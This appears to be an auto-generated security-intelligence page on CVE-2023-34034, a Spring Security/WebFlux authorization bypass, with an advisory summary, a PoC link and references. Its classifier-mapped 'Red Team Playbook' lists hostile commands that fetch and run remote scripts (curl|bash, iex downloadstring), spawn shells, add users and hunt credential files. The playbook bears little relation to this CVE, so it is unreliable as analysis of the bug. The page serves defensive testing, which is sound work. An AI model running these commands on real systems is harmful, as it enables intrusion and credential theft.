CVE-2023-34034
Overview
This vulnerability is an authentication bypass caused by inconsistent pattern matching between Spring Security and Spring WebFlux when using the "**" pattern in security configuration. The root cause lies in the mismatch of how these frameworks interpret the wildcard pattern, leading to incorrect authorization checks. The affected component is the Spring Security module's WebFlux integration, specifically in its request matcher implementation.
Vulnerability Description
Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.
Impact
An unauthenticated attacker can bypass security controls on WebFlux endpoints configured with the vulnerable pattern, gaining unauthorized access to protected resources. This allows exposure of sensitive data and potentially unauthorized application functionality without any user interaction or credentials. The business consequence includes data breaches and violation of access policies in applications relying on Spring Security WebFlux for authorization enforcement.
Solution
Upgrade Spring Security to the fixed versions as detailed in the Spring advisory at https://spring.io/security/cve-2023-34034. The vendor recommends avoiding the use of the "**" pattern in WebFlux security configurations until patched. Refer to the NetApp advisory NTAP-20230814-0008 for additional guidance and mitigation steps. Applying the vendor-provided patches or configuration changes as per these advisories is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from a misconfiguration in the Spring Security framework when used with Spring WebFlux, specifically related to the use of the "**" pattern in security configurations. This pattern is intended to match any sequence of characters, but due to discrepancies in how Spring Security and Spring WebFlux interpret this wildcard, it can lead to unintended access control bypasses. The mismatch creates a scenario where certain endpoints may not be adequately protected, allowing unauthorized users to access sensitive resources that should otherwise be restricted.
Attack vectors exploiting this vulnerability can be varied and sophisticated. An attacker could leverage this flaw by crafting requests that target endpoints configured with the problematic pattern. For instance, if an application is designed to restrict access to specific user roles or permissions, an attacker could manipulate the request path to exploit the misconfiguration, gaining access to restricted functionalities or data. This could be particularly damaging in applications that handle sensitive information, such as personal data or financial records, where unauthorized access could lead to data breaches or identity theft.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on Spring Security for their web applications. The high CVSS score of 9.8 indicates a critical risk level, suggesting that successful exploitation could lead to severe consequences, including data loss, reputational damage, and financial penalties. Businesses that fail to address this vulnerability may find themselves exposed to compliance issues, particularly if they operate in regulated industries where data protection is paramount. Furthermore, the potential for exploitation could lead to increased scrutiny from stakeholders and customers, undermining trust in the organization’s ability to safeguard sensitive information.
To detect and mitigate this vulnerability, organizations should first conduct a thorough review of their Spring Security configurations, specifically examining the use of wildcard patterns in their security rules. Implementing automated security testing tools that can identify misconfigurations in real-time can also be beneficial. Additionally, organizations should consider adopting best practices for security configuration management, such as regularly updating dependencies to the latest versions and applying security patches as they become available. Training development teams on secure coding practices and the implications of misconfigured security settings can further bolster defenses against potential exploitation.
In conclusion, the vulnerability stemming from the misconfiguration of Spring Security with Spring WebFlux poses a significant threat to web applications. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare to defend against this risk. Proactive detection and mitigation strategies are essential to safeguard sensitive data and maintain compliance with security standards, ultimately protecting both the organization and its users from the adverse effects of security breaches.
Recent updates to the CVSS and EPSS scores for CVE-2023-34034 reflect a refined understanding of the vulnerability’s exploitability and impact. The CVSS score adjustment from 9.8 to 9.1, while slightly lowering the criticality rating, aligns more accurately with the current technical assessment of the vulnerability’s complexity and potential impact. Concurrently, the EPSS score has increased modestly, indicating a slight rise in the probability of exploitation as observed through CSURFACE threat intelligence. This subtle uptick in exploit likelihood is corroborated by the emergence of new proof-of-concept demonstrations on public repositories, signaling growing attacker interest and capability to leverage the authorization bypass in Spring Security configurations with WebFlux. For defenders, this evolving landscape underscores the need to maintain vigilance despite the marginally reduced severity score, as the practical risk of exploitation is trending upward. The nuanced shift in risk metrics suggests that while the vulnerability remains critical, the exploitation window may be widening, warranting continued monitoring of exploit development and deployment patterns captured by our telemetry. Overall, the threat level remains high, with increased exploitation potential that could impact organizations relying on affected Spring Security versions.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Spring Security | All |
cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*
|
|
|
Vmware | Spring Security | All |
cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*
|
|
|
Vmware | Spring Security | All |
cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*
|
|
|
Vmware | Spring Security | All |
cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*
|
|
|
Vmware | Spring Security | All |
cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
hotblac/cve-2023-34034
Demonstration of CVE-2023-24034 authorization bypass in Spring Security
|
hotblac | 1 | 1 | 2023-12-02 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-34034 |
| spring.io |
GitHub CVE
|
https://spring.io/security/cve-2023-34034 |
| security.netapp.com |
GitHub CVE
|
https://security.netapp.com/advisory/ntap-20230814-0008/ |